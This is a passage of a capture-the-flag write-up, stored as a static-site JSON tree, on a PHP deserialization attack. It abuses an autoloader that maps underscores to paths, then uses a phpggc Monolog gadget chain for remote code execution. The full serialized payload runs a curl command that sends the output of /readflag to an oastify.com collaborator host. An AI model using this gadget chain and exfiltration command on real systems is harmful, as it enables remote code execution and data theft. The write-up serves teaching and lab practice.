(",{"type":32,"tag":99,"props":2380,"children":2381},{"style":704},[2382],{"type":38,"value":2383},"preg_match",{"type":32,"tag":99,"props":2385,"children":2386},{"style":284},[2387],{"type":38,"value":374},{"type":32,"tag":99,"props":2389,"children":2390},{"style":295},[2391],{"type":38,"value":2392},"'/",{"type":32,"tag":99,"props":2394,"children":2396},{"style":2395},"--shiki-default:#C4704F",[2397],{"type":38,"value":2398},"Controller",{"type":32,"tag":99,"props":2400,"children":2401},{"style":339},[2402],{"type":38,"value":2024},{"type":32,"tag":99,"props":2404,"children":2405},{"style":295},[2406],{"type":38,"value":2407},"/'",{"type":32,"tag":99,"props":2409,"children":2410},{"style":284},[2411],{"type":38,"value":620},{"type":32,"tag":99,"props":2413,"children":2414},{"style":284},[2415],{"type":38,"value":573},{"type":32,"tag":99,"props":2417,"children":2418},{"style":545},[2419],{"type":38,"value":2050},{"type":32,"tag":99,"props":2421,"children":2422},{"style":284},[2423],{"type":38,"value":2424},"))",{"type":32,"tag":99,"props":2426,"children":2427},{"style":284},[2428],{"type":38,"value":720},{"type":32,"tag":99,"props":2430,"children":2431},{"class":101,"line":122},[2432,2437,2441,2445,2449,2454,2459,2463,2468,2472],{"type":32,"tag":99,"props":2433,"children":2434},{"style":284},[2435],{"type":38,"value":2436},"        
$",{"type":32,"tag":99,"props":2438,"children":2439},{"style":545},[2440],{"type":38,"value":2050},{"type":32,"tag":99,"props":2442,"children":2443},{"style":284},[2444],{"type":38,"value":1228},{"type":32,"tag":99,"props":2446,"children":2447},{"style":295},[2448],{"type":38,"value":746},{"type":32,"tag":99,"props":2450,"children":2451},{"style":301},[2452],{"type":38,"value":2453},"controllers/",{"type":32,"tag":99,"props":2455,"children":2456},{"style":284},[2457],{"type":38,"value":2458},"${",{"type":32,"tag":99,"props":2460,"children":2461},{"style":301},[2462],{"type":38,"value":2050},{"type":32,"tag":99,"props":2464,"children":2465},{"style":284},[2466],{"type":38,"value":2467},"}",{"type":32,"tag":99,"props":2469,"children":2470},{"style":295},[2471],{"type":38,"value":402},{"type":32,"tag":99,"props":2473,"children":2474},{"style":284},[2475],{"type":38,"value":1832},{"type":32,"tag":99,"props":2477,"children":2478},{"class":101,"line":137},[2479,2484,2489,2493,2497,2501,2505,2510,2514,2518,2522,2526,2530,2534],{"type":32,"tag":99,"props":2480,"children":2481},{"style":284},[2482],{"type":38,"value":2483},"    }",{"type":32,"tag":99,"props":2485,"children":2486},{"style":126},[2487],{"type":38,"value":2488}," 
elseif",{"type":32,"tag":99,"props":2490,"children":2491},{"style":284},[2492],{"type":38,"value":2378},{"type":32,"tag":99,"props":2494,"children":2495},{"style":704},[2496],{"type":38,"value":2383},{"type":32,"tag":99,"props":2498,"children":2499},{"style":284},[2500],{"type":38,"value":374},{"type":32,"tag":99,"props":2502,"children":2503},{"style":295},[2504],{"type":38,"value":2392},{"type":32,"tag":99,"props":2506,"children":2507},{"style":2395},[2508],{"type":38,"value":2509},"Model",{"type":32,"tag":99,"props":2511,"children":2512},{"style":339},[2513],{"type":38,"value":2024},{"type":32,"tag":99,"props":2515,"children":2516},{"style":295},[2517],{"type":38,"value":2407},{"type":32,"tag":99,"props":2519,"children":2520},{"style":284},[2521],{"type":38,"value":620},{"type":32,"tag":99,"props":2523,"children":2524},{"style":284},[2525],{"type":38,"value":573},{"type":32,"tag":99,"props":2527,"children":2528},{"style":545},[2529],{"type":38,"value":2050},{"type":32,"tag":99,"props":2531,"children":2532},{"style":284},[2533],{"type":38,"value":2424},{"type":32,"tag":99,"props":2535,"children":2536},{"style":284},[2537],{"type":38,"value":720},{"type":32,"tag":99,"props":2539,"children":2540},{"class":101,"line":147},[2541,2545,2549,2553,2557,2562,2566,2570,2574,2578],{"type":32,"tag":99,"props":2542,"children":2543},{"style":284},[2544],{"type":38,"value":2436},{"type":32,"tag":99,"props":2546,"children":2547},{"style":545},[2548],{"type":38,"value":2050},{"type":32,"tag":99,"props":2550,"children":2551},{"style":284},[2552],{"type":38,"value":1228},{"type":32,"tag":99,"props":2554,"children":2555},{"style":295},[2556],{"type":38,"value":746},{"type":32,"tag":99,"props":2558,"children":2559},{"style":301},[2560],{"type":38,"value":2561},"models/",{"type":32,"tag":99,"props":2563,"children":2564},{"style":284},[2565],{"type":38,"value":2458},{"type":32,"tag":99,"props":2567,"children":2568},{"style":301},[2569],{"type":38,"value":2050},{"type":32,"tag":99,"props"
:2571,"children":2572},{"style":284},[2573],{"type":38,"value":2467},{"type":32,"tag":99,"props":2575,"children":2576},{"style":295},[2577],{"type":38,"value":402},{"type":32,"tag":99,"props":2579,"children":2580},{"style":284},[2581],{"type":38,"value":1832},{"type":32,"tag":99,"props":2583,"children":2584},{"class":101,"line":156},[2585,2589,2593,2597,2601,2605,2609,2614,2618,2622,2626,2630,2634],{"type":32,"tag":99,"props":2586,"children":2587},{"style":284},[2588],{"type":38,"value":2483},{"type":32,"tag":99,"props":2590,"children":2591},{"style":126},[2592],{"type":38,"value":2488},{"type":32,"tag":99,"props":2594,"children":2595},{"style":284},[2596],{"type":38,"value":2378},{"type":32,"tag":99,"props":2598,"children":2599},{"style":704},[2600],{"type":38,"value":2383},{"type":32,"tag":99,"props":2602,"children":2603},{"style":284},[2604],{"type":38,"value":374},{"type":32,"tag":99,"props":2606,"children":2607},{"style":295},[2608],{"type":38,"value":2392},{"type":32,"tag":99,"props":2610,"children":2611},{"style":2395},[2612],{"type":38,"value":2613},"_",{"type":32,"tag":99,"props":2615,"children":2616},{"style":295},[2617],{"type":38,"value":2407},{"type":32,"tag":99,"props":2619,"children":2620},{"style":284},[2621],{"type":38,"value":620},{"type":32,"tag":99,"props":2623,"children":2624},{"style":284},[2625],{"type":38,"value":573},{"type":32,"tag":99,"props":2627,"children":2628},{"style":545},[2629],{"type":38,"value":2050},{"type":32,"tag":99,"props":2631,"children":2632},{"style":284},[2633],{"type":38,"value":2424},{"type":32,"tag":99,"props":2635,"children":2636},{"style":284},[2637],{"type":38,"value":720},{"type":32,"tag":99,"props":2639,"children":2640},{"class":101,"line":170},[2641,2645,2649,2653,2658,2662,2666,2670,2674,2678,2682,2687,2691,2695,2699,2703],{"type":32,"tag":99,"props":2642,"children":2643},{"style":284},[2644],{"type":38,"value":2436},{"type":32,"tag":99,"props":2646,"children":2647},{"style":545},[2648],{"type":38,"value":2050},
{"type":32,"tag":99,"props":2650,"children":2651},{"style":284},[2652],{"type":38,"value":1228},{"type":32,"tag":99,"props":2654,"children":2655},{"style":704},[2656],{"type":38,"value":2657}," preg_replace",{"type":32,"tag":99,"props":2659,"children":2660},{"style":284},[2661],{"type":38,"value":374},{"type":32,"tag":99,"props":2663,"children":2664},{"style":295},[2665],{"type":38,"value":2392},{"type":32,"tag":99,"props":2667,"children":2668},{"style":2395},[2669],{"type":38,"value":2613},{"type":32,"tag":99,"props":2671,"children":2672},{"style":295},[2673],{"type":38,"value":2407},{"type":32,"tag":99,"props":2675,"children":2676},{"style":284},[2677],{"type":38,"value":620},{"type":32,"tag":99,"props":2679,"children":2680},{"style":295},[2681],{"type":38,"value":2064},{"type":32,"tag":99,"props":2683,"children":2684},{"style":301},[2685],{"type":38,"value":2686},"/",{"type":32,"tag":99,"props":2688,"children":2689},{"style":295},[2690],{"type":38,"value":606},{"type":32,"tag":99,"props":2692,"children":2693},{"style":284},[2694],{"type":38,"value":620},{"type":32,"tag":99,"props":2696,"children":2697},{"style":284},[2698],{"type":38,"value":573},{"type":32,"tag":99,"props":2700,"children":2701},{"style":545},[2702],{"type":38,"value":2050},{"type":32,"tag":99,"props":2704,"children":2705},{"style":284},[2706],{"type":38,"value":385},{"type":32,"tag":99,"props":2708,"children":2709},{"class":101,"line":183},[2710],{"type":32,"tag":99,"props":2711,"children":2712},{"style":284},[2713],{"type":38,"value":1092},{"type":32,"tag":99,"props":2715,"children":2716},{"class":101,"line":196},[2717],{"type":32,"tag":99,"props":2718,"children":2719},{"emptyLinePlaceholder":141},[2720],{"type":38,"value":144},{"type":32,"tag":99,"props":2722,"children":2723},{"class":101,"line":204},[2724,2728,2733,2737,2741,2745,2749,2753,2757,2762,2766],{"type":32,"tag":99,"props":2725,"children":2726},{"style":284},[2727],{"type":38,"value":1771},{"type":32,"tag":99,"props":2729,"children"
:2730},{"style":545},[2731],{"type":38,"value":2732},"filename",{"type":32,"tag":99,"props":2734,"children":2735},{"style":284},[2736],{"type":38,"value":1228},{"type":32,"tag":99,"props":2738,"children":2739},{"style":295},[2740],{"type":38,"value":746},{"type":32,"tag":99,"props":2742,"children":2743},{"style":301},[2744],{"type":38,"value":2686},{"type":32,"tag":99,"props":2746,"children":2747},{"style":284},[2748],{"type":38,"value":2458},{"type":32,"tag":99,"props":2750,"children":2751},{"style":301},[2752],{"type":38,"value":2050},{"type":32,"tag":99,"props":2754,"children":2755},{"style":284},[2756],{"type":38,"value":2467},{"type":32,"tag":99,"props":2758,"children":2759},{"style":301},[2760],{"type":38,"value":2761},".php",{"type":32,"tag":99,"props":2763,"children":2764},{"style":295},[2765],{"type":38,"value":402},{"type":32,"tag":99,"props":2767,"children":2768},{"style":284},[2769],{"type":38,"value":1832},{"type":32,"tag":99,"props":2771,"children":2772},{"class":101,"line":213},[2773],{"type":32,"tag":99,"props":2774,"children":2775},{"emptyLinePlaceholder":141},[2776],{"type":38,"value":144},{"type":32,"tag":99,"props":2778,"children":2779},{"class":101,"line":226},[2780,2784,2788,2793,2797,2801,2805],{"type":32,"tag":99,"props":2781,"children":2782},{"style":126},[2783],{"type":38,"value":2373},{"type":32,"tag":99,"props":2785,"children":2786},{"style":284},[2787],{"type":38,"value":2378},{"type":32,"tag":99,"props":2789,"children":2790},{"style":704},[2791],{"type":38,"value":2792},"file_exists",{"type":32,"tag":99,"props":2794,"children":2795},{"style":284},[2796],{"type":38,"value":542},{"type":32,"tag":99,"props":2798,"children":2799},{"style":545},[2800],{"type":38,"value":2732},{"type":32,"tag":99,"props":2802,"children":2803},{"style":284},[2804],{"type":38,"value":2424},{"type":32,"tag":99,"props":2806,"children":2807},{"style":284},[2808],{"type":38,"value":720},{"type":32,"tag":99,"props":2810,"children":2811},{"class":101,"line":234},[281
2,2817,2821,2825],{"type":32,"tag":99,"props":2813,"children":2814},{"style":126},[2815],{"type":38,"value":2816},"        require",{"type":32,"tag":99,"props":2818,"children":2819},{"style":284},[2820],{"type":38,"value":573},{"type":32,"tag":99,"props":2822,"children":2823},{"style":545},[2824],{"type":38,"value":2732},{"type":32,"tag":99,"props":2826,"children":2827},{"style":284},[2828],{"type":38,"value":1832},{"type":32,"tag":99,"props":2830,"children":2831},{"class":101,"line":243},[2832],{"type":32,"tag":99,"props":2833,"children":2834},{"style":284},[2835],{"type":38,"value":1092},{"type":32,"tag":99,"props":2837,"children":2838},{"class":101,"line":256},[2839,2844,2848,2852,2856,2861,2866,2870,2874,2878],{"type":32,"tag":99,"props":2840,"children":2841},{"style":126},[2842],{"type":38,"value":2843},"    elseif",{"type":32,"tag":99,"props":2845,"children":2846},{"style":284},[2847],{"type":38,"value":2378},{"type":32,"tag":99,"props":2849,"children":2850},{"style":704},[2851],{"type":38,"value":2792},{"type":32,"tag":99,"props":2853,"children":2854},{"style":284},[2855],{"type":38,"value":374},{"type":32,"tag":99,"props":2857,"children":2858},{"style":126},[2859],{"type":38,"value":2860},"__DIR__",{"type":32,"tag":99,"props":2862,"children":2863},{"style":339},[2864],{"type":38,"value":2865}," 
.",{"type":32,"tag":99,"props":2867,"children":2868},{"style":284},[2869],{"type":38,"value":573},{"type":32,"tag":99,"props":2871,"children":2872},{"style":545},[2873],{"type":38,"value":2732},{"type":32,"tag":99,"props":2875,"children":2876},{"style":284},[2877],{"type":38,"value":2424},{"type":32,"tag":99,"props":2879,"children":2880},{"style":284},[2881],{"type":38,"value":720},{"type":32,"tag":99,"props":2883,"children":2885},{"class":101,"line":2884},16,[2886,2890,2895,2899,2903,2907],{"type":32,"tag":99,"props":2887,"children":2888},{"style":126},[2889],{"type":38,"value":2816},{"type":32,"tag":99,"props":2891,"children":2892},{"style":126},[2893],{"type":38,"value":2894}," __DIR__",{"type":32,"tag":99,"props":2896,"children":2897},{"style":339},[2898],{"type":38,"value":2865},{"type":32,"tag":99,"props":2900,"children":2901},{"style":284},[2902],{"type":38,"value":573},{"type":32,"tag":99,"props":2904,"children":2905},{"style":545},[2906],{"type":38,"value":2732},{"type":32,"tag":99,"props":2908,"children":2909},{"style":284},[2910],{"type":38,"value":1832},{"type":32,"tag":99,"props":2912,"children":2914},{"class":101,"line":2913},17,[2915],{"type":32,"tag":99,"props":2916,"children":2917},{"style":284},[2918],{"type":38,"value":1092},{"type":32,"tag":99,"props":2920,"children":2922},{"class":101,"line":2921},18,[2923],{"type":32,"tag":99,"props":2924,"children":2925},{"style":284},[2926],{"type":38,"value":2927},"});\n",{"type":32,"tag":47,"props":2929,"children":2930},{},[2931],{"type":38,"value":2932},"Our goal here will be to pollute this function in order to allow loading the file /www/frontend/vendor/autoload.php. Because /www/frontend/vendor/autoload.php will load all the classes from the frontend vendor folder.",{"type":32,"tag":47,"props":2934,"children":2935},{},[2936],{"type":38,"value":2937},"For this, we need to create a serialized string that meets the expectations of the function. 
If our serialized string loads a class, it will go through this function.",{"type":32,"tag":47,"props":2939,"children":2940},{},[2941],{"type":38,"value":2942},"We can see that this function calls preg_replace, which replaces every '_' character in the name with a '/'.",{"type":32,"tag":85,"props":2944,"children":2945},{"land":510},[2946],{"type":32,"tag":90,"props":2947,"children":2949},{"code":2948,"language":510,"meta":7,"className":515,"style":7},"elseif (preg_match('/_/', $name)) {\n  $name = preg_replace('/_/', '/', $name);\n}\n",[2950],{"type":32,"tag":63,"props":2951,"children":2952},{"__ignoreMap":7},[2953,3005,3073],{"type":32,"tag":99,"props":2954,"children":2955},{"class":101,"line":102},[2956,2961,2965,2969,2973,2977,2981,2985,2989,2993,2997,3001],{"type":32,"tag":99,"props":2957,"children":2958},{"style":126},[2959],{"type":38,"value":2960},"elseif",{"type":32,"tag":99,"props":2962,"children":2963},{"style":284},[2964],{"type":38,"value":2378},{"type":32,"tag":99,"props":2966,"children":2967},{"style":704},[2968],{"type":38,"value":2383},{"type":32,"tag":99,"props":2970,"children":2971},{"style":284},[2972],{"type":38,"value":374},{"type":32,"tag":99,"props":2974,"children":2975},{"style":295},[2976],{"type":38,"value":2392},{"type":32,"tag":99,"props":2978,"children":2979},{"style":2395},[2980],{"type":38,"value":2613},{"type":32,"tag":99,"props":2982,"children":2983},{"style":295},[2984],{"type":38,"value":2407},{"type":32,"tag":99,"props":2986,"children":2987},{"style":284},[2988],{"type":38,"value":620},{"type":32,"tag":99,"props":2990,"children":2991},{"style":284},[2992],{"type":38,"value":573},{"type":32,"tag":99,"props":2994,"children":2995},{"style":545},[2996],{"type":38,"value":2050},{"type":32,"tag":99,"props":2998,"children":2999},{"style":284},[3000],{"type":38,"value":2424},{"type":32,"tag":99,"props":3002,"children":3003},{"style":284},[3004],{"type":38,"value":720},{"type":32,"tag":99,"props":3006,"children":3007},{"class":101,"line"
:112},[3008,3013,3017,3021,3025,3029,3033,3037,3041,3045,3049,3053,3057,3061,3065,3069],{"type":32,"tag":99,"props":3009,"children":3010},{"style":284},[3011],{"type":38,"value":3012},"  $",{"type":32,"tag":99,"props":3014,"children":3015},{"style":545},[3016],{"type":38,"value":2050},{"type":32,"tag":99,"props":3018,"children":3019},{"style":284},[3020],{"type":38,"value":1228},{"type":32,"tag":99,"props":3022,"children":3023},{"style":704},[3024],{"type":38,"value":2657},{"type":32,"tag":99,"props":3026,"children":3027},{"style":284},[3028],{"type":38,"value":374},{"type":32,"tag":99,"props":3030,"children":3031},{"style":295},[3032],{"type":38,"value":2392},{"type":32,"tag":99,"props":3034,"children":3035},{"style":2395},[3036],{"type":38,"value":2613},{"type":32,"tag":99,"props":3038,"children":3039},{"style":295},[3040],{"type":38,"value":2407},{"type":32,"tag":99,"props":3042,"children":3043},{"style":284},[3044],{"type":38,"value":620},{"type":32,"tag":99,"props":3046,"children":3047},{"style":295},[3048],{"type":38,"value":2064},{"type":32,"tag":99,"props":3050,"children":3051},{"style":301},[3052],{"type":38,"value":2686},{"type":32,"tag":99,"props":3054,"children":3055},{"style":295},[3056],{"type":38,"value":606},{"type":32,"tag":99,"props":3058,"children":3059},{"style":284},[3060],{"type":38,"value":620},{"type":32,"tag":99,"props":3062,"children":3063},{"style":284},[3064],{"type":38,"value":573},{"type":32,"tag":99,"props":3066,"children":3067},{"style":545},[3068],{"type":38,"value":2050},{"type":32,"tag":99,"props":3070,"children":3071},{"style":284},[3072],{"type":38,"value":385},{"type":32,"tag":99,"props":3074,"children":3075},{"class":101,"line":122},[3076],{"type":32,"tag":99,"props":3077,"children":3078},{"style":284},[3079],{"type":38,"value":423},{"type":32,"tag":47,"props":3081,"children":3082},{},[3083],{"type":38,"value":3084},"And then this function adds a / at the beginning of the file 
name.",{"type":32,"tag":85,"props":3086,"children":3087},{"land":510},[3088],{"type":32,"tag":90,"props":3089,"children":3091},{"code":3090,"language":510,"meta":7,"className":515,"style":7},"$filename = \"/${name}.php\";\n",[3092],{"type":32,"tag":63,"props":3093,"children":3094},{"__ignoreMap":7},[3095],{"type":32,"tag":99,"props":3096,"children":3097},{"class":101,"line":102},[3098,3102,3106,3110,3114,3118,3122,3126,3130,3134,3138],{"type":32,"tag":99,"props":3099,"children":3100},{"style":284},[3101],{"type":38,"value":2024},{"type":32,"tag":99,"props":3103,"children":3104},{"style":545},[3105],{"type":38,"value":2732},{"type":32,"tag":99,"props":3107,"children":3108},{"style":284},[3109],{"type":38,"value":1228},{"type":32,"tag":99,"props":3111,"children":3112},{"style":295},[3113],{"type":38,"value":746},{"type":32,"tag":99,"props":3115,"children":3116},{"style":301},[3117],{"type":38,"value":2686},{"type":32,"tag":99,"props":3119,"children":3120},{"style":284},[3121],{"type":38,"value":2458},{"type":32,"tag":99,"props":3123,"children":3124},{"style":301},[3125],{"type":38,"value":2050},{"type":32,"tag":99,"props":3127,"children":3128},{"style":284},[3129],{"type":38,"value":2467},{"type":32,"tag":99,"props":3131,"children":3132},{"style":301},[3133],{"type":38,"value":2761},{"type":32,"tag":99,"props":3135,"children":3136},{"style":295},[3137],{"type":38,"value":402},{"type":32,"tag":99,"props":3139,"children":3140},{"style":284},[3141],{"type":38,"value":1832},{"type":32,"tag":47,"props":3143,"children":3144},{},[3145],{"type":38,"value":3146},"So if we pass this string:",{"type":32,"tag":85,"props":3148,"children":3149},{},[3150],{"type":32,"tag":90,"props":3151,"children":3153},{"code":3152},"www_frontend_vendor_autoload\n",[3154],{"type":32,"tag":63,"props":3155,"children":3156},{"__ignoreMap":7},[3157],{"type":38,"value":3152},{"type":32,"tag":47,"props":3159,"children":3160},{},[3161],{"type":38,"value":3162},"The function will change our string to 
this:",{"type":32,"tag":85,"props":3164,"children":3165},{},[3166],{"type":32,"tag":90,"props":3167,"children":3169},{"code":3168},"/www/frontend/vendor/autoload\n",[3170],{"type":32,"tag":63,"props":3171,"children":3172},{"__ignoreMap":7},[3173],{"type":38,"value":3168},{"type":32,"tag":47,"props":3175,"children":3176},{},[3177],{"type":38,"value":3178},"We add a var_dump before the require, and after the unserialize, for debugging purposes.",{"type":32,"tag":47,"props":3180,"children":3181},{},[3182],{"type":38,"value":3183},"We submit this serialized string:",{"type":32,"tag":85,"props":3185,"children":3186},{},[3187],{"type":32,"tag":90,"props":3188,"children":3190},{"code":3189},"O:28:\"www_frontend_vendor_autoload\":0:{}\n",[3191],{"type":32,"tag":63,"props":3192,"children":3193},{"__ignoreMap":7},[3194],{"type":38,"value":3189},{"type":32,"tag":47,"props":3196,"children":3197},{},[3198,3200],{"type":38,"value":3199},"We can see this output when we submit the login form:\n",{"type":32,"tag":466,"props":3201,"children":3203},{"width":468,"src":3202},"https://user-images.githubusercontent.com/28403617/227588741-a9c20422-e49d-41f1-ae03-485ef75179af.png",[],{"type":32,"tag":47,"props":3205,"children":3206},{},[3207],{"type":32,"tag":1992,"props":3208,"children":3209},{},[3210],{"type":38,"value":3211},"What is the __PHP_Incomplete_Class object ?",{"type":32,"tag":47,"props":3213,"children":3214},{},[3215],{"type":38,"value":3216},"The unserialize tries to load the class named \"www_frontend_vendor_autoload\", but it doesn't exist, so PHP falls back to the spl_autoload_register callback.\nIt replaces every '_' with '/' and adds a / at the beginning of the string.\nThen it includes the file /www/frontend/vendor/autoload.php. 
But the class named www_frontend_vendor_autoload still does not exist.",{"type":32,"tag":47,"props":3218,"children":3219},{},[3220],{"type":38,"value":3221},"That is why we get a __PHP_Incomplete_Class object when we try to print the deserialized class. This __PHP_Incomplete_Class does not stop the execution of the script, so we can add more elements to the serialized string and they will be executed as well.",{"type":32,"tag":40,"props":3223,"children":3225},{"id":3224},"php-gadgets-part-2",[3226],{"type":38,"value":3227},"PHP Gadgets part 2",{"type":32,"tag":47,"props":3229,"children":3230},{},[3231],{"type":38,"value":3232},"Now that we are certain the autoload file from the frontend is loaded, we know that the frontend vendor directory is now accessible from the backend folder. Now we have all the elements to craft our final payload with phpggc that will execute commands during deserialization.",{"type":32,"tag":47,"props":3234,"children":3235},{},[3236],{"type":38,"value":3237},"We need to have an array containing two elements:",{"type":32,"tag":47,"props":3239,"children":3240},{},[3241],{"type":38,"value":3242},"The first one will include the autoload.php script.",{"type":32,"tag":85,"props":3244,"children":3245},{},[3246],{"type":32,"tag":90,"props":3247,"children":3248},{"code":3189},[3249],{"type":32,"tag":63,"props":3250,"children":3251},{"__ignoreMap":7},[3252],{"type":38,"value":3189},{"type":32,"tag":47,"props":3254,"children":3255},{},[3256,3258,3263],{"type":38,"value":3257},"The second is our phpggc payload. 
From ",{"type":32,"tag":1992,"props":3259,"children":3260},{},[3261],{"type":38,"value":3262},"Monolog/RCE1",{"type":38,"value":3264}," gadget.",{"type":32,"tag":85,"props":3266,"children":3267},{},[3268],{"type":32,"tag":90,"props":3269,"children":3271},{"code":3270},"O:32:\"MonologHandlerSyslogUdpHandler\":1:{s:6:\"socket\";O:29:\"MonologHandlerBufferHandler\":7:{s:7:\"handler\";r:4;s:10:\"bufferSize\";i:-1;s:6:\"buffer\";a:1:{i:0;a:2:{i:0;s:62:\"curl e8nxzx9mnynbf74h1hcofv6i0964uvik.oastify.com/$(/readflag)\";s:5:\"level\";N;}}s:5:\"level\";N;s:11:\"initialized\";b:1;s:11:\"bufferLimit\";i:-1;s:10:\"processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}\n",[3272],{"type":32,"tag":63,"props":3273,"children":3274},{"__ignoreMap":7},[3275],{"type":38,"value":3270},{"type":32,"tag":47,"props":3277,"children":3278},{},[3279],{"type":38,"value":3280},"When we assemble these two elements, we get this payload:",{"type":32,"tag":85,"props":3282,"children":3283},{},[3284],{"type":32,"tag":90,"props":3285,"children":3287},{"code":3286},"a:2:{i:0;O:28:\\\"www_frontend_vendor_autoload\\\":0:{}i:1;O:32:\\\"Monolog\\\\Handler\\\\SyslogUdpHandler\\\":1:{s:6:\\\"socket\\\";O:29:\\\"Monolog\\\\Handler\\\\BufferHandler\\\":7:{s:7:\\\"handler\\\";r:4;s:10:\\\"bufferSize\\\";i:-1;s:6:\\\"buffer\\\";a:1:{i:0;a:2:{i:0;s:62:\\\"curl e8nxzx9mnynbf74h1hcofv6i0964uvik.oastify.com/$(/readflag)\\\";s:5:\\\"level\\\";N;}}s:5:\\\"level\\\";N;s:11:\\\"initialized\\\";b:1;s:11:\\\"bufferLimit\\\";i:-1;s:10:\\\"processors\\\";a:2:{i:0;s:7:\\\"current\\\";i:1;s:6:\\\"system\\\";}}}}\n",[3288],{"type":32,"tag":63,"props":3289,"children":3290},{"__ignoreMap":7},[3291],{"type":38,"value":3286},{"type":32,"tag":47,"props":3293,"children":3294},{},[3295],{"type":38,"value":3296},"We submit this payload to modify the access field of the user admin, and we perform the login to execute our payload from deserialization. 
And voila, we have the flag.",{"type":32,"tag":3298,"props":3299,"children":3301},"custom-image",{"imgSrc":3300},"https://user-images.githubusercontent.com/28403617/227621371-87fe5a93-c01c-4b9a-b7ec-dbb152d5a8c5.png",[],{"type":32,"tag":3303,"props":3304,"children":3305},"style",{},[3306],{"type":38,"value":3307},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":112,"depth":102,"links":3309},[3310,3311,3312,3313,3314,3315,3316],{"id":42,"depth":112,"text":45},{"id":426,"depth":112,"text":429},{"id":473,"depth":112,"text":476},{"id":1252,"depth":112,"text":1255},{"id":2235,"depth":112,"text":2238},{"id":2266,"depth":112,"text":2269},{"id":3224,"depth":112,"text":3227},"markdown","content:writeups:unearthly-shop.md","content","writeups/unearthly-shop.md","writeups/unearthly-shop","md",1749027224672]